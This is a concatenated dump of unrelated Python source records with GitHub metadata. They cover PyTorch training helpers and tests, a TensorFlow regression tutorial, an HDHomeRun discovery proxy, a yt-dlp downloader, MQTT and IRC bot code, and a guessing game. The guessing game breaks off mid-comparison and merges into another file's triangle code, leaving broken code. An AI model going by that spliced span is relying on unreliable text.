inf/nan was found.\n \"\"\"\n if not isinstance(vals, (tuple, list)):\n if not isinstance(vals, torch.Tensor):\n raise Exception('\"vals\" must have type torch.Tensor or list of'\n 'torch.Tensor, found \"{}\"'.format(type(vals)))\n vals = [vals]\n\n inf_nan_found = False\n for v in vals:\n if not torch.all(torch.isfinite(v)):\n inf_nan_found = True\n break\n return inf_nan_found\n\n\nclass RunningLoss:\n def __init__(self):\n self.reset()\n\n def update(self, **kwargs):\n for k, v in kwargs.items():\n it = self._its.get(k, 0)\n self._data[k] = self._data.get(k, 0) * (it/(it + 1)) + v/(it + 1)\n self._its[k] = it + 1\n\n def reset(self):\n self._data = {}\n self._its = {}\n\n def get_losses(self):\n return self._data.copy()\n\n\n################################################################################\n### Tests\nif __name__ == '__main__':\n from .. import unit_test as jbut\n\n ############################################################################\n ### Test PcloudsCmpVisualizer - clrs\n jbut.next_test('PcloudsCmpVisualizer - clrs')\n import matplotlib.pyplot as plt\n\n B = 4\n num_imgs = 1\n V = 50\n\n vis = PcloudsCmpVisualizer(num_imgs)\n\n # Generate data.\n pc1 = np.random.uniform(-1., 0., (B, V, 3)).astype(np.float32)\n pc2 = np.random.uniform(0., 1., (B, V, 3)).astype(np.float32)\n\n clrs1 = np.array([1., 0., 0.], dtype=np.float32)\n clrs2 = np.random.uniform(0.5, 0.85, (B, V, 3)).astype(np.float32)\n\n # imgs = vis(pc1, pc2)\n imgs = vis(pc1, pc2, clr_a=clrs1, clr_b=clrs2)\n\n assert(len(imgs) == num_imgs)\n\n plt.figure()\n plt.imshow(imgs[0].transpose((1, 2, 0)))\n plt.show()\n\n ############################################################################\n ### Test DmapsCmpVisualizer\n jbut.next_test('DmapsCmpVisualizer')\n from .. 
import file_sys as jbfs\n import matplotlib.pyplot as plt\n\n num_imgs = 2\n text = 'test_plot'\n # text_pos = (380, 350)\n text_pos = (380, 100)\n path_dmaps = '/cvlabdata1/cvlab/datasets_jan/human_garment/ds_female_tshirt/depth_maps/body_0007'\n path_plots = '/cvlabdata2/home/jan/projects/jblib/jblib/tests/torch_helpers_test'\n\n vis = DmapsCmpVisualizer(num_imgs, text=text, text_pos=text_pos)\n\n # Get some depth maps\n dm_files = jbfs.ls(path_dmaps, exts='npz')\n dmaps = np.zeros((len(dm_files), 400, 400), dtype=np.float32)\n for i, dmf in enumerate(dm_files):\n dmaps[i] = np.load(jbfs.jn(path_dmaps, dmf))['depth']\n\n imgs = vis(dmaps[:4], dmaps[-4:])\n\n assert(len(imgs) == 2)\n assert(imgs[0].shape == (400, 800, 3))\n\n fig = plt.figure()\n plt.imshow(imgs[0])\n # fig.savefig(jbfs.jn(path_plots, 'plt.png'))\n plt.show()\n\n ############################################################################\n ### Test DmapsCmpVisualizer\n jbut.next_test('TrainStateSaver - robustness against save failure')\n\n pth = '/cvlabdata2/home/jan/projects/cont_param/test/nonexistent'\n f = 'w.tar'\n f2 = 'w2.tar'\n pth_f = jbfs.jn(pth, f)\n pth_f2 = jbfs.jn(pth, f2)\n model = torch.nn.Sequential(torch.nn.Linear(1, 1, bias=False))\n list(model.parameters())[0][0, 0] = 1.\n\n jbfs.make_dir(pth)\n saver = TrainStateSaver(pth_f, model=model, verbose=True)\n shutil.rmtree(pth)\n saver()\n\n assert not os.path.exists(pth_f)\n\n jbfs.make_dir(pth)\n saver()\n\n assert os.path.exists(pth_f)\n assert torch.load(pth_f)['weights']['0.weight'] == 1.\n\n list(model.parameters())[0][0, 0] = 2.\n saver()\n assert torch.load(pth_f)['weights']['0.weight'] == 2.\n\n list(model.parameters())[0][0, 0] = 3.\n saver(file_path_override=pth_f2)\n assert os.path.exists(pth_f)\n assert os.path.exists(pth_f2)\n assert torch.load(pth_f)['weights']['0.weight'] == 2.\n assert torch.load(pth_f2)['weights']['0.weight'] == 3.\n\n list(model.parameters())[0][0, 0] = 4.\n saver()\n assert os.path.exists(pth_f)\n assert os.path.exists(pth_f2)\n assert torch.load(pth_f)['weights']['0.weight'] == 4.\n assert torch.load(pth_f2)['weights']['0.weight'] == 3.\n\n list(model.parameters())[0][0, 0] = 5.\n shutil.rmtree(pth)\n saver()\n assert not os.path.exists(pth_f)\n\n list(model.parameters())[0][0, 0] = 6.\n jbfs.make_dir(pth)\n saver()\n assert os.path.exists(pth_f)\n assert torch.load(pth_f)['weights']['0.weight'] == 6.\n","repo_name":"bednarikjan/jblib","sub_path":"deep_learning/torch_helpers.py","file_name":"torch_helpers.py","file_ext":"py","file_size_in_byte":19907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20891538586","text":"import tensorflow as tf\r\nimport numpy as np\r\n\r\nlearning_rate = 0.01\r\ntraining_steps = 10000\r\ndisplay_step = 50\r\n\r\n\r\nX = [[1], [2], [3]]\r\nY = [[5], [8], [11]]\r\n\r\n\r\nW = tf.Variable(np.random.randn(), name=\"weight\")\r\nb = tf.Variable(np.random.randn(), name=\"bias\")\r\n\r\noptimizer = tf.optimizers.SGD(learning_rate)\r\n\r\n\r\ndef linear_regression(x):\r\n return W * x + b\r\n\r\n\r\nfor step in range(1, training_steps + 1):\r\n # Run the optimization to update W and b values.\r\n with tf.GradientTape() as tape:\r\n pred = linear_regression(X)\r\n loss = tf.reduce_mean(tf.square(pred - Y))\r\n\r\n # Compute gradients.\r\n gradients = tape.gradient(loss, [W, b])\r\n\r\n # Update W and b following gradients.\r\n optimizer.apply_gradients(zip(gradients, [W, b]))\r\n\r\n if step % display_step == 0:\r\n pred = 
linear_regression(X)\r\n loss = tf.reduce_mean(tf.square(pred - Y))\r\n print(\"step: %i, loss: %f, W: %f, b: %f\" % (step, loss, W.numpy(), b.numpy()))\r\n\r\n","repo_name":"jk96491/NeuralNetwork_Tutorials","sub_path":"Week03/Tensorflow/single.py","file_name":"single.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"35069092309","text":"#!/usr/bin/env python3\n\nimport asyncio\nimport functools\nimport os\nimport socket\nimport struct\nimport sys\nfrom typing import Optional\n\n# UDP port used to receive discovery requests on 255.255.255.255.\n# Defined at: https://github.com/Silicondust/libhdhomerun/blob/master/hdhomerun_pkt.h\nHDHOMERUN_DISCOVER_UDP_PORT=65001\n\n# We arbitrarily use the same port for the app proxy's TCP server that\n# is used to forward requests between the tuner proxy and the tuner proxy.\n# It could be anything as long as the 2 proxies use the same port.\nTCP_PORT = HDHOMERUN_DISCOVER_UDP_PORT\n\nDEBUG = 'DEBUG' in os.environ\n\ndef log(str: str):\n print(str, file=sys.stderr)\n\n# Encodes messages to and decodes messages from a byte stream.\nclass MessageCodec:\n def __init__(self):\n self._msg_buffer = bytes()\n self._length_bytes_remaining = 2\n self._msg_bytes_remaining = 0\n\n def encode(self, data: bytes):\n return struct.pack(f'>H{len(data)}s', len(data), data)\n\n def decode(self, data: bytes, message_callback):\n i = 0\n\n while True:\n\n while self._length_bytes_remaining:\n if i >= len(data):\n # Not enough bytes received yet to know the length of the message.\n return\n\n # The length is big-endian.\n self._length_bytes_remaining -= 1\n self._msg_bytes_remaining |= (data[i] << (self._length_bytes_remaining * 8))\n i += 1\n\n if self._msg_bytes_remaining:\n # There are more bytes required. Read as much as we can.\n data_read = data[i: i + self._msg_bytes_remaining]\n data_read_len = len(data_read)\n # Append the data to the message.\n self._msg_buffer += data_read\n self._msg_bytes_remaining -= data_read_len\n i += data_read_len\n\n if self._msg_bytes_remaining:\n # There are more bytes required.\n return\n\n # We have a complete message.\n message = self._msg_buffer\n\n # Reset the state. Do that now to avoid reentrance issues.\n self._length_bytes_remaining = 2\n self._msg_bytes_remaining = 0\n self._msg_buffer = bytes()\n\n # Return the message via the callback.\n message_callback(message)\n\n# Proxy that acts like a tuner. 
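It forwards each discovery datagram received from the app over a TCP link, framed with MessageCodec's two-byte big-endian length prefix, so for example b'hi' travels as b'\\x00\\x02hi'. 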
Runs on the same network as the\n# app and communicates with the app proxy running on the tuner's\n# network.\nclass TunerProxy:\n tcp_transport : Optional[asyncio.Transport] = None\n udp_transport : Optional[asyncio.DatagramProtocol] = None\n codec = MessageCodec()\n\n class TCPClientProtocol(asyncio.Protocol):\n def __init__(self, on_con_lost):\n self.on_con_lost = on_con_lost\n\n def connection_made(self, transport: asyncio.Transport):\n TunerProxy.tcp_transport = transport\n peername = transport.get_extra_info(\"peername\")\n log(f'Connected to app proxy: {peername[0]}:{peername[1]}')\n\n def _on_message_received_from_app_proxy(self, msg):\n # Unpack the message.\n addr, port, data = struct.unpack(f'!4sH{len(msg) - 6}s', msg)\n ip = socket.inet_ntoa(addr)\n\n # Send the reply back to the app.\n if DEBUG:\n log(f'Replying with {len(data)} bytes to {ip}:{port}')\n with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:\n sock.sendto(data, (ip, port))\n\n def data_received(self, data):\n if DEBUG:\n log(f'Received {len(data)} bytes from app proxy')\n TunerProxy.codec.decode(data, self._on_message_received_from_app_proxy)\n\n def connection_lost(self, exc):\n if DEBUG:\n log('The server closed the connection')\n try:\n self.on_con_lost.set_result(True)\n except asyncio.exceptions.InvalidStateError:\n # Ignore errors during KeyboardInterrupt shutdown.\n pass\n\n class UdpProtocol:\n def connection_made(self, transport: asyncio.DatagramTransport):\n TunerProxy.udp_transport = transport\n\n def datagram_received(self, data, addr):\n # Ignore datagrams until the tcp_transport is available.\n if TunerProxy.tcp_transport:\n ip, port = addr\n # We received a broadcast from the HDHomeRun app. Package it up into\n # a message containing the source address, port, and payload and send\n # it to the app_proxy. When or if a response comes back, it will\n # contain the same source address and port so we can send it back to\n # the app.\n message = struct.pack(f'!4sH{len(data)}s',\n socket.inet_aton(ip),\n port,\n data)\n\n encoded_message = TunerProxy.codec.encode(message)\n\n if DEBUG:\n log(f'UDP broadcast received {len(data)} bytes from {ip}:{port}')\n log(f'Sending {len(encoded_message)} bytes to app proxy')\n\n TunerProxy.tcp_transport.write(encoded_message)\n\n def connection_lost(self, exc):\n # This method needs to exist during shutdown.\n pass\n\n async def run_async(app_proxy_host):\n loop = asyncio.get_running_loop()\n try:\n\n await loop.create_datagram_endpoint(\n lambda: TunerProxy.UdpProtocol(),\n local_addr=('255.255.255.255', HDHOMERUN_DISCOVER_UDP_PORT),\n reuse_port=True,\n allow_broadcast=True)\n\n while True:\n # Create a future to await so we know when the connection is lost.\n on_tcp_connection_lost = loop.create_future()\n\n log('Connecting to app proxy ...')\n try:\n await loop.create_connection(\n lambda: TunerProxy.TCPClientProtocol(on_tcp_connection_lost),\n app_proxy_host, TCP_PORT)\n except OSError as exc:\n if exc.errno == -2:\n log(f'Unknown host: {app_proxy_host}')\n sys.exit(-1)\n\n else:\n # We'll get here if the server on the other end isn't responding.\n log('Failed to connect. 
Sleeping ...')\n # Wait a few seconds before attempting to reconnect.\n await asyncio.sleep(3)\n continue\n try:\n await on_tcp_connection_lost\n finally:\n TunerProxy.tcp_transport.close()\n TunerProxy.tcp_transport = None\n\n log('Connection lost')\n # Wait a few seconds before attempting to reconnect.\n try:\n await asyncio.sleep(3)\n except asyncio.exceptions.CancelledError:\n pass\n log('Attempting reconnection ...')\n\n finally:\n try:\n if TunerProxy.tcp_transport:\n TunerProxy.tcp_transport.close()\n except:\n pass\n try:\n if TunerProxy.udp_transport:\n TunerProxy.udp_transport.close()\n except:\n pass\n\n def usage():\n return f'{sys.argv[0]} tunerproxy '\n\n def run():\n if len(sys.argv) < 3 or len(sys.argv) > 3:\n log(TunerProxy.usage())\n sys.exit(-1)\n try:\n asyncio.run(TunerProxy.run_async(sys.argv[2]))\n except KeyboardInterrupt:\n log('Exiting ...')\n\n# Proxy that acts like an app. Runs on the same network as the\n# tuner and communicates with the tuner proxy running on the\n# app's network.\nclass AppProxy:\n tcp_transport : Optional[asyncio.Transport] = None\n codec = MessageCodec()\n\n # A protocol object that manages a UDP socket for a single query that communicates\n # with the tuner. Each query may result is multiple reponses - each tuner can\n # reply with multiple replies, and there may be more than one tuner on the network. \n class ClientDatagramProtocol:\n def __init__(self, reply_callback):\n self.reply_callback = reply_callback\n\n # Implementation of DatagramProtocol\n def connection_made(self, transport : asyncio.DatagramTransport):\n pass\n\n # Implementation of DatagramProtocol\n def connection_lost(self, exc):\n pass\n\n # Implementation of DatagramProtocol\n def datagram_received(self, data, addr):\n self.reply_callback(data)\n\n async def query_tuner_async(self, query_data):\n # Create an endpoint.\n loop = asyncio.get_running_loop()\n datagram_endpoint, protocol = await loop.create_datagram_endpoint(\n lambda: self,\n allow_broadcast=True,\n remote_addr=('255.255.255.255', HDHOMERUN_DISCOVER_UDP_PORT))\n\n datagram_endpoint.sendto(query_data)\n\n # Give the tuner some time to respond then clean up.\n # We don't know how many responses we will get, so we'll just hang around\n # for a while then clean up. 
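The 0.5 s window below trades latency for completeness; replies arriving after the endpoint closes are simply lost. 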
\n await asyncio.sleep(0.5)\n datagram_endpoint.close()\n\n def query_tuner(query_data, reply_callback):\n client = AppProxy.ClientDatagramProtocol(reply_callback)\n asyncio.create_task(client.query_tuner_async(query_data))\n \n # A protocol object that manages a TCP connection from a tuner proxy.\n class TcpServerProtocol(asyncio.Protocol):\n def connection_made(self, transport: asyncio.Transport):\n AppProxy.tcp_transport = transport\n peername = transport.get_extra_info('peername')\n log(f'Tuner proxy at {peername[0]}:{peername[1]} connected')\n self.transport = transport\n\n # Protocol implementation.\n def data_received(self, data):\n # Convert the stream data into a message.\n AppProxy.codec.decode(data, self.on_received_message)\n\n # Handle a message that has been received from the client.\n def on_received_message(self, msg):\n # The message is encoded to contain the original source address\n # and port of the app that made the request to the tuner_proxy.\n source_addr, source_port, query_data = struct.unpack(f'!4sH{len(msg) - 6}s', msg)\n\n # Perform the query.\n AppProxy.ClientDatagramProtocol.query_tuner(\n query_data,\n functools.partial(self.reply, source_addr, source_port))\n\n def reply(self, source_addr : bytes, source_port, reply_data):\n # Pack up the data.\n reply = struct.pack(f'!4sH{len(reply_data)}s', \n source_addr,\n source_port,\n reply_data)\n \n # Send back to the tuner proxy.\n self.transport.write(AppProxy.codec.encode(reply))\n \n async def run_async(app_proxy_host):\n loop = asyncio.get_running_loop()\n server = await loop.create_server(\n lambda: AppProxy.TcpServerProtocol(),\n app_proxy_host, HDHOMERUN_DISCOVER_UDP_PORT)\n\n async with server:\n await server.serve_forever()\n\n def usage():\n return f'{sys.argv[0]} appproxy [bind_to_host_address]'\n\n def run():\n try:\n # Use the given address to bind to, otherwise pass None\n # to bind to all interfaces.\n asyncio.run(AppProxy.run_async(sys.argv[2] if len(sys.argv) > 2 else None))\n except KeyboardInterrupt:\n log('Exiting ...')\n\nif __name__ == '__main__':\n\n if len(sys.argv) > 1:\n if sys.argv[1] == 'tunerproxy':\n TunerProxy.run()\n sys.exit(0)\n elif sys.argv[1] == 'appproxy':\n AppProxy.run()\n sys.exit(0)\n\n\n log(f'Usage:')\n log(f' {TunerProxy.usage()}')\n log(' OR')\n log(f' {AppProxy.usage()}')\n sys.exit(-1)\n\n","repo_name":"simeoncran/hdhomerun_proxy","sub_path":"message_codec.py","file_name":"message_codec.py","file_ext":"py","file_size_in_byte":12447,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"31510709194","text":"from yt_dlp import YoutubeDL\n\n\n\ndef download_playlist(playlist_url, limit=None):\n ydl_opts = {\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n }\n if limit is not None:\n ydl_opts['playlistend'] = limit\n with YoutubeDL(ydl_opts) as ydl:\n ydl.download([playlist_url])\n \n\n\nplaylist_url = 'https://www.youtube.com/watch?v=V7xQd3yt590&list=RDV7xQd3yt590&start_radio=1&rv=V7xQd3yt590&t=3'\ndownload_playlist(playlist_url,limit=3)\n","repo_name":"ticofookfook/YT_Downloads","sub_path":"Yt_downloads.py","file_name":"Yt_downloads.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"38350141619","text":"import time\n\nimport paho.mqtt.client as paho\n#broker=\"broker.hivemq.com\"\ntry:\n\tbroker = 
\"192.168.2.41\"\n\n\tsub_list = [\"topic1\", \"topic2\"]\n\tglobal flag \n\tflag = True\n\t#define callback\n\tdef on_message(client, userdata, message):\n\t\tprint(type(message))\n\t\ttry:\n\t\t\t#print(type(client))\n\t\t\tprint(f\"client is {client._client_id}\")\n\t\texcept Exception as err:\n\t\t\tprint(err)\n\t\ttime.sleep(1)\n\t\tprint(\"HERE\")\n\t\t\n\t\tmessage = str(message.payload.decode(\"utf-8\"))\n\t\t\n\t\tprint(message=='bye', message, type(message))\n\t\tif message is 'bye' or message == '9':\n\t\t\tprint(\"Made it in\")\n\t\t\tglobal flag\n\t\t\tflag = False\n\t\t#print(\"Made it below 9 or bye\")\n\t\ttry:\n\t\t\tif int(message) % 2 == 0:\n\t\t\t\t#print(f\"trying to publish {message}\")\n\t\t\t\tclient.publish(sub_list[1], f\"{message} message recived on pi\")\n\t\texcept:\n\t\t\tprint(\"Message not int\")\n\t\tprint(\"received message =\",message)\n\n\tclient= paho.Client(\"client-002\")\n\t #create client object client1.on_publish = on_publish #assign function to callback client1.connect(broker,port)\n\t#establish connection client1.publish(\"house/bulb1\",\"on\")\n\t######Bind function to callback\n\tclient.on_message=on_message\n\t#####\n\tprint(\"connecting to broker \",broker)\n\tclient.connect(broker)#connect\n\tclient.loop_start() #start loop to process received messages\n\tprint(\"subscribing \")\n\tclient.subscribe(sub_list[0])#subscribe\n\ttime.sleep(2)\n\tcount = 0\n\tprint(\"publishing\")\n\twhile flag:\n\t\tclient.publish(sub_list[1],f\"this is the pi at {count}\")#publish\n\t\t#print(f\"flag is {flag}\")\n\t\tcount +=1\n\t\ttime.sleep(1)\n\tprint(\"turning off mqtt\")\n\ttime.sleep(1)\n\t#client.disconnect() #disconnect\nfinally:\n\tclient.disconnect()\n\tprint(\"closing\")\n\tclient.loop_stop() #stop loop\n\n","repo_name":"will-sloan/mqtt_comp","sub_path":"mqtt_script_pi.py","file_name":"mqtt_script_pi.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28425459246","text":"import re\nfrom enum import Enum\nfrom typing import Dict, Optional, TYPE_CHECKING\n\nfrom desertbot.channel import IRCChannel\nfrom desertbot.user import IRCUser\n\nif TYPE_CHECKING:\n from desertbot.desertbot import DesertBot\n\n\nclass TargetTypes(Enum):\n CHANNEL = 1\n USER = 2\n \n\nclass IRCMessage(object):\n def __init__(self, msgType: str, user: IRCUser, channel: Optional[IRCChannel], message: str, bot: 'DesertBot',\n metadata: Dict=None, tags: Dict=None):\n if metadata is None:\n metadata = {}\n self.metadata = metadata\n if tags is None:\n tags = {}\n self.tags = tags\n\n if isinstance(message, bytes):\n unicodeMessage = message.decode('utf-8', 'ignore')\n else: # Already utf-8?\n unicodeMessage = message\n self.type = msgType\n self.messageList = unicodeMessage.strip().split(' ')\n self.messageString = unicodeMessage\n self.user = user\n\n self.channel = None\n if channel is None:\n self.replyTo = self.user.nick\n self.targetType = TargetTypes.USER\n else:\n self.channel = channel\n # I would like to set this to the channel object but I would probably break functionality if I did :I\n self.replyTo = channel.name\n self.targetType = TargetTypes.CHANNEL\n\n self.command = ''\n self.parameters = ''\n self.parameterList = []\n\n if len(self.messageList) == 1 and self.messageList[0] == bot.commandChar:\n self.command = ''\n elif self.messageList[0].startswith(bot.commandChar) and self.messageList[0][:3].count(bot.commandChar) == 1:\n self.command = 
self.messageList[0][len(bot.commandChar):]\n            if self.command == '':\n                self.command = self.messageList[1]\n                self.parameters = u' '.join(self.messageList[2:])\n            else:\n                self.parameters = u' '.join(self.messageList[1:])\n        elif re.match('{}[:,]?'.format(re.escape(bot.nick)), self.messageList[0], re.IGNORECASE):\n            if len(self.messageList) > 1:\n                self.command = self.messageList[1]\n                self.parameters = u' '.join(self.messageList[2:])\n        self.command = self.command.lower()\n        if self.parameters.strip():\n            self.parameterList = self.parameters.split(' ')\n\n        self.parameterList = [param for param in self.parameterList if param != '']\n\n        if len(self.parameterList) == 1 and not self.parameterList[0]:\n            self.parameterList = []\n","repo_name":"DesertBot/DesertBot","sub_path":"desertbot/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"15043422276","text":"#!/usr/bin/env python\n\nimport matplotlib.pyplot as plt\nimport math\n\nstep_size = 40\nfraction_still = 0.225\nfraction_moving = 0.55\n\ndef stance_step_fwd(t):\n    return 0.5 - t + fraction_still\n    #if (t + 0.5) < fraction_still:\n        #return swing_step_fwd(t) + 1.0\n    #elif (t + 0.5) < fraction_still + fraction_moving:\n        ##return -0.5 * math.cos(math.pi * ((t + 0.5) - fraction_still) / fraction_moving)\n        ##scale = 10\n        ##t = scale * (-0.5 + (t + 0.5 - fraction_still) / fraction_moving)\n        ##minVal = sigmoid(-scale * 0.5)\n        ##maxVal = sigmoid(scale * 0.5)\n        \n        ###print -2 * (t - fraction_still) / fraction_moving\n        ##return (1 - 2 * m) * (0.5 - (sigmoid(t) - minVal) / (maxVal - minVal))\n        #x = (t + 0.5 - fraction_still) / fraction_moving\n        #m2 = 0.75# / fraction_moving\n        #return -m2 * x + 0.25 + 0.125\n    #else:\n        #return swing_step_fwd(t) - 1.0\n    \n\ndef sigmoid(t):\n    return 1.0 / (1.0 + math.exp(-t))\n\ndef swing_step_fwd(t):\n    if (t + 0.5) < fraction_still:\n        return -0.5 - t + fraction_still\n    if (t + 0.5) < fraction_still + fraction_moving:\n        #return -0.5 * math.cos(math.pi * ((t + 0.5) - fraction_still) / fraction_moving)\n        scale = 10\n        t = scale * (-0.5 + (t + 0.5 - fraction_still) / fraction_moving)\n        minVal = sigmoid(-scale * 0.5)\n        maxVal = sigmoid(scale * 0.5)\n        \n        #print -2 * (t - fraction_still) / fraction_moving\n        return (1.0 + fraction_still * 2) * (-0.5 + (sigmoid(t) - minVal) / (maxVal - minVal)) + 0.5 + fraction_still\n    else:\n        return 1.5 - t + fraction_still\n\nnumVals = 1000\nts = [x / float(numVals) - 0.5 for x in range(numVals)]\n\nleft = []\nright = []\nxs = []\n\nright.extend(map(stance_step_fwd,ts))\nleft.extend(map(swing_step_fwd,ts))\nxs.extend(ts)\n\nright.extend(map(swing_step_fwd,ts))\nleft.extend(map(stance_step_fwd,ts))\nxs.extend([t + 1.0 for t in ts])\n\nright.extend(map(stance_step_fwd,ts))\nleft.extend(map(swing_step_fwd,ts))\nxs.extend([t + 2.0 for t in ts])\n\nright = [step_size * y for y in right]\nleft = [step_size * y for y in left]\n\noffset = [abs(l - r) for l,r in zip(left,right)]\n\nplt.plot(xs,left)\nplt.plot(xs,right)\nplt.plot(xs,offset)\nplt.show()\n","repo_name":"LARG/robotics-2018","sub_path":"tools/testStep.py","file_name":"testStep.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"42339938858","text":"from pokemon import *\nfrom pessoa import *\nfrom time import sleep\nfrom pickle import dump, load  # library that turns any object into bytes\n\n\ndef escolher_pokemon_inicial(player):\n    print(\"Hello {}, you can now choose the Pokemon that will accompany you on this journey\".format(player))\n\n    pikachu = PokemonEletrico(\"Pikachu\", level=1)\n    charmander = PokemonFogo(\"Charmander\", level=1)\n    squirtle = PokemonAgua(\"Squirtle\", level=1)\n\n    print(\"You have 3 choices:\")\n    print(\"1 - \", pikachu)\n    print(\"2 - \", charmander)\n    print(\"3 - \", squirtle)\n\n    while True:\n        escolha = input(\"Choose your Pokemon: \")\n\n        if escolha == \"1\":\n            player.capturar(pikachu)\n            break\n        elif escolha == \"2\":\n            player.capturar(charmander)\n            break\n        elif escolha == \"3\":\n            player.capturar(squirtle)\n            break\n        else:\n            print(\"Invalid choice!\")\n\n\ndef salvar_jogo(player):\n    try:\n        with open(\"database.db\", \"wb\") as arquivo:\n            dump(player, arquivo)  # dump the player into the file as bytes\n            print(\"Game saved successfully!!!\")\n    except Exception as error:\n        print(\"Error saving the game: {}\".format(error))\n\n\ndef carregar_jogo():\n    try:\n        with open(\"database.db\", \"rb\") as arquivo:\n            player = load(arquivo)\n            print(\"Loading completed successfully!!!\")\n            return player\n    except Exception as error:\n        print(\"Save not found.\")\n\n\nif __name__ == \"__main__\":\n    print(\"-------------------------------------------------\")\n    print(\"   Welcome to the terminal Pokemon RPG game   \")\n    print(\"-------------------------------------------------\")\n\n    player = carregar_jogo()\n\n    if not player:  # If there is no player yet, create one, run the first battle, etc.\n\n        nome = input(\"Hello, what is your name: \")\n\n        player = Player(nome)\n        print(\"Hello {}, this is a world inhabited by Pokemons. Your mission is to become a Pokemon master.\".format(player))\n        print(\"Capture as many pokemons as you can and battle your friends\")\n        player.mostrar_dinheiro()\n\n        if player.pokemons:\n            print(\"I see you already have some pokemons\")\n            player.mostrar_pokemons()\n        else:\n            print(\"You have no pokemon yet. Choose one\")\n            escolher_pokemon_inicial(player)\n\n        print(\"Done, now you can face your arch-rival from kindergarten: Gary\")\n        gary = Inimigo(nome=\"Gary\", pokemons=[PokemonAgua(\"Squirtle\", level=1)])\n        player.batalhar(gary)\n\n        salvar_jogo(player)  # at the end of the first battle, save the game\n\n    # If a player already exists, go straight to the main menu\n    while True:\n        print(\"-----\" * 10)\n        print(\"What do you want to do?\")\n        print('''1 - Explore and try to find pokemons \\n2 - Fight an enemy \\n3 - See your pokemons \\n4 - See your balance \\n0 - Quit the game''')\n        escolha = input(\"Choose an option: \")\n\n        if escolha == \"0\":\n            print(\"Closing the game...\")\n            sleep(1)\n            break\n        elif escolha == \"1\":\n            player.explorar()\n            salvar_jogo(player)\n        elif escolha == \"2\":\n            inimigo_aleatorio = Inimigo()\n            player.batalhar(inimigo_aleatorio)\n            salvar_jogo(player)\n        elif escolha == \"3\":\n            player.mostrar_pokemons()\n        elif escolha == \"4\":\n            player.mostrar_dinheiro()\n        else:\n            print(\"Invalid option!!!\")\n","repo_name":"isaias0rt0n/pokemon-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25278635470","text":"# -*- coding: utf-8 -*-\nfrom setuptools import setup\nimport os\n\n# Utility function to read the README file.\n# Used for the long_description. 
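(PyPI renders this string as the project page.) 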
It's nice, because now 1) we have a top level\n# README file and 2) it's easier to type in the README file than to put a raw\n# string in below ...\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\n\nsetup(\n name='django-profiler',\n version='2.0.0',\n description='util for profiling python code mainly in django projects, but can be used also on ordinary python code',\n long_description=read('README.rst'),\n author=u'Vladimír Gorej',\n author_email='gorej@codescale.net',\n url='http://www.codescale.net/en/community#django-profiler',\n download_url='http://github.com/CodeScaleInc/django-profiler/tarball/master',\n license='BSD',\n keywords = 'django profiler profiling code profile',\n packages=['profiling'],\n platforms='any',\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Console',\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Utilities',\n 'Topic :: Software Development :: Debuggers',\n 'Topic :: Software Development :: Bug Tracking'\n ],\n #test_suite=''\n)","repo_name":"char0n/django-profiler","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"32"} +{"seq_id":"23883278577","text":"import allure\nimport pytest\nfrom typing import List\nfrom src.main.java.testAlgo.yang_hu.bubble_sorting import bubble_sorting\n\n\ntest_data = [\n ([60, 50, 95, 80, 70], [50, 60, 70, 80, 95]),\n ([95, 50, 60, 80, 70], [50, 60, 70, 80, 95]),\n ([60, 70, 95, 80, 50], [50, 60, 70, 80, 95]),\n ([95, 80, 70, 60, 50], [50, 60, 70, 80, 95]),\n ([50, 60, 70, 80, 95], [50, 60, 70, 80, 95]),\n]\n\n\n@allure.feature(\"Yang Hu\")\n@allure.story(\"Bubble sorting\")\n@pytest.mark.parametrize(\"input_array,expected_result\", test_data)\ndef test_bubble_sorting(input_array: List[int], expected_result: List[int]):\n assert expected_result == bubble_sorting(input_array)\n","repo_name":"apetrovskiy/testAlgo","sub_path":"src/test/java/testAlgo/yang_hu/test_bubble_sorting.py","file_name":"test_bubble_sorting.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16678207728","text":"\r\nimport random\r\na = int(random.randint(0,100))\r\nguessNum = 0\r\n\r\nwhile guessNum < 7:\r\n print(\"What's your guess?\")\r\n guess = int(input())\r\n\r\n guessNum = guessNum + 1\r\n \r\n if a>guess:\r\n print(\"Too low\")\r\n elif a sides[2]:\n res += 1\nprint(res)\n\n","repo_name":"tcourtai/AdventOfCode_2016","sub_path":"AdventOfCode2_1/AoC_3_1.py","file_name":"AoC_3_1.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35645206835","text":"\"\"\" TEDLium dataset handler\n\"\"\"\nimport os\nimport shutil\nimport subprocess\nimport unicodedata\n\nfrom tqdm import tqdm\n\nimport utils\nfrom corpus import 